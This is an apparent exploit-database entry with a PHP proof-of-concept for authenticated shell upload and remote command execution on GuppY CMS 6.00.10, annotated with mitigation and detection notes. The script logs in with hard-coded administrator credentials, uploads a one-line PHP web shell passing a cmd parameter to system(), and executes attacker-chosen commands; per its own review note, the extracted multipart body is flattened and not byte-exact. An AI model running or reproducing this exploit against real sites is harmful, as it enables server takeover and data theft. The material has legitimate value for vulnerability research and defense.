GuppY CMS 6.00.10 Shell Upload

2022.10.01
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

# Exploit Title: GuppY 6.00.10 CMS Remote Code Execution
# Date: Sep 30, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.freeguppy.org/
# Software Link: https://www.freeguppy.org/fgy6dn.php?lng=en&pg=279927&tconfig=0#z2
# Version: 6.00.10
# Tested on: Linux
#!/usr/bin/php
<?php
// Proof of concept for an authenticated file upload that ends in remote command
// execution on GuppY CMS 6.00.10 (version as stated in the header above).
// Three requests share one cURL handle and one cookie jar:
//   1. POST guppy/connect.php                   - log in as an administrator
//   2. POST guppy/admin/admin.php (pg=upload)   - upload a file named shell.php
//   3. GET  guppy/file/shell.php                - request the uploaded file
// The script needs valid administrator credentials. What it relies on is that the
// admin upload form accepts a .php file and that the file is then reachable under
// guppy/file/ and executed as PHP. That matches CWE-434 (unrestricted upload of
// file with dangerous type) more precisely than a generic access-control class.
//
// Defender notes:
//   - Mitigation: disable script execution in the upload directory at the
//     web-server level, restrict uploads to an allow-list of extensions, and
//     protect the admin account (strong unique password, restricted access to
//     guppy/admin/).
//   - Detection: a POST to admin.php with pg=upload followed by a GET for a .php
//     file under guppy/file/ that carries a cmd= query parameter; any unexpected
//     .php file in that directory.
//
// NOTE(review): this listing was flattened when the page was extracted. Statements
// are laid out one per line here; string literals are kept exactly as the page
// shows them, so the multipart body below has spaces where the original
// presumably had line breaks, and one header string contains a line break.

// Administrator credentials are hard-coded; the login request sends them as the
// pseudo and uid form fields.
$username = "Admin"; // Administrator username
$password = "rose1337"; // Administrator password

// -u (base URL) and -c (command) are both required; otherwise the usage text is
// printed and the script exits.
$options = getopt('u:c:');
if(!isset($options['u'], $options['c']))
    die("\n GuppY 6.00.10 CMS Remote Code Execution \n Author: Chokri Hammedi \n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n \n");
$target = $options['u'];
$command = $options['c'];

// Request 1: administrator login.
// Session cookies are read from and written to cookie.txt in the current working
// directory, which is how the later requests reuse the authenticated session.
$cookie="cookie.txt";
$url = "{$target}guppy/connect.php";
$postdata = "connect=on&uuser=old&pseudo=".$username."&uid=".$password;
$curlObj = curl_init();
curl_setopt($curlObj, CURLOPT_URL, $url);
curl_setopt($curlObj, CURLOPT_RETURNTRANSFER, 1);
// Response headers are included in the returned data. The option stays set on the
// handle for the upload request and is only switched off before the third request.
curl_setopt($curlObj, CURLOPT_HEADER, 1);
// TLS certificate verification is disabled here and again for each later request.
curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt ($curlObj, CURLOPT_POSTFIELDS, $postdata);
curl_setopt ($curlObj, CURLOPT_POST, 1);
// PHP function names are case-insensitive, so CURL_setopt and CURL_SETOPT are the
// same function as curl_setopt. RETURNTRANSFER was already set above.
CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);
CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True);
CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30);
CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30);
curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie");
curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie");
// The login response is stored but never inspected, so a failed login is not
// detected at this point.
$result = curl_exec($curlObj);

// Request 2: file upload through the admin panel.
// The multipart body has two parts: "rep" with the value "file", and "ficup", the
// uploaded file, declared as shell.php with Content-Type application/x-php. The file
// content is a one-line PHP script that passes the cmd query parameter to system().
// From a defender's point of view this is the request the server-side upload
// handler should reject, on both file name and content.
$url2 = "{$target}guppy/admin/admin.php?lng=en&pg=upload";
$post='------WebKitFormBoundarygA1APFcUlkIaWal4 Content-Disposition: form-data; name="rep" file ------WebKitFormBoundarygA1APFcUlkIaWal4 Content-Disposition: form-data; name="ficup"; filename="shell.php" Content-Type: application/x-php <?php system($_GET["cmd"]); ?> ------WebKitFormBoundarygA1APFcUlkIaWal4-- ';
// Static request headers with a hard-coded multipart boundary and a browser-like
// User-Agent; log-based detection should therefore not key on the User-Agent.
$headers = array(
    'Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygA1APFcUlkIaWal4',
    'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; 
x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36',
    'Accept-Encoding: gzip, deflate',
    'Accept-Language: en-US,en;q=0.9'
);
curl_setopt($curlObj, CURLOPT_HTTPHEADER, $headers);
curl_setopt($curlObj, CURLOPT_URL, $url2);
curl_setopt($curlObj, CURLOPT_POSTFIELDS, $post);
curl_setopt($curlObj, CURLOPT_POST, true);
// The options below repeat values already set on this handle for request 1.
curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);
CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);
CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True);
CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30);
CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30);
curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie");
curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie");
// The upload response is stored but never inspected either.
$data = curl_exec($curlObj);

// Request 3: fetch the uploaded file from guppy/file/ with the -c value in the
// cmd query parameter. In web-server access logs this appears as a request for a
// .php file in the upload directory with a cmd= query string.
$shell = "{$target}guppy/file/shell.php?cmd=" .$command;
curl_setopt($curlObj, CURLOPT_URL, $shell);
// Replaces the multipart header list that was set for request 2.
curl_setopt($curlObj, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, False);
CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);
// Response headers are left out this time so only the body is printed.
curl_setopt($curlObj, CURLOPT_HEADER, False);
// POST is switched off for this request.
curl_setopt($curlObj, CURLOPT_POST, false);
$exec_shell = curl_exec($curlObj);

// Only the HTTP status of this last request is checked. Any status other than 200
// is reported as a credential problem, although a rejected upload would look the same.
$code = curl_getinfo($curlObj, CURLINFO_HTTP_CODE);
if($code != 200) {
    // The message is wrapped in ANSI escape sequences (blink, red).
    echo "\n\n \e[5m\033[31m[-]Something went wrong! \n [-]Please check the credentials\n";
} else {
    print("\n");
    print($exec_shell);
}
curl_close($curlObj);
?>

